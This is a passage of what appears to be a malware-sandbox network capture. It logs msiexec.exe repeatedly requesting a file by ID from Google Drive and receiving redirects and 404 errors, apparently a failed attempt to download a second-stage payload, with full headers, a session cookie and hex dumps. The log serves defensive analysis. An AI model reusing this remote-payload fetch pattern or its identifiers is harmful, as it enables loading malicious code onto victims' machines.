2025-01-11 02:09:02 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:02 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQ-tKfMRuEQdnnFF7QRIVOa_P6icTjTqG5Ml-qicHRe_KMt9WkNN07-qK1i3wOQcXAra79gCtE Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:02 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-HaRabD7Fy40heglCo9695Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:02 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 53 4b 6f 6c 32 50 74 75 63 5a 31 48 36 66 69 31 55 7a 71 31 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SSKol2PtucZ1H6fi1Uzq1A">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49998	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:03 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:04 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:04 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-vSOSS-jutU3bGVgm6nCSqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49999	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:04 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:05 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSFiTvrky_OPF3K2xPo35YnJ1wssKCZQNAhQwvoI04yWOPVgJ0yoDVdZb2MX6ux4ZM7 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:05 GMT Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-X6e-y3LR0GferA64o65Gaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:05 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 4e 36 75 76 70 51 70 66 37 68 2d 58 45 75 47 49 5f 30 6c 65 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sN6uvpQpf7h-XEuGI_0leA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	50000	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:06 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:06 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:06 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-bQI7gkAGHL9xRvnYG9oztA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	50001	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:07 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:07 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSmBxuVFba_G4a6WzZ25kMXng3pWzsd6ys_JxET9QLqaRWh7ekzExVgCKaIs6GYUq5GgTZR0ho Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:07 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-ZRQUhTXXa02TxOkI58e7YQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:07 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 5f 4a 39 74 64 6c 78 43 63 70 4a 4b 32 31 6d 4c 35 56 4d 47 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U_J9tdlxCcpJK21mL5VMGQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	50002	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:08 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:08 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:08 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-bOgQgmZl4QDUUAkqA3aAlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	50003	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:09 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:10 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQoLyRS-oHiXpoR-g1-L-qKmBl47C5EWq_XcAWQcCaeMrxPDUk9D6ED7V5Slzvkpf-fY6aklD4 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:10 GMT Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-bFacEBQz5V1q2gFCLXxOlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:10 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 4b 33 65 69 42 71 59 7a 52 32 6a 76 63 34 72 6c 5a 6a 79 62 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yK3eiBqYzR2jvc4rlZjybg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	50004	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:10 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:11 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:11 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Fx6eWkeSD496QbzAlVtsMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	50005	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
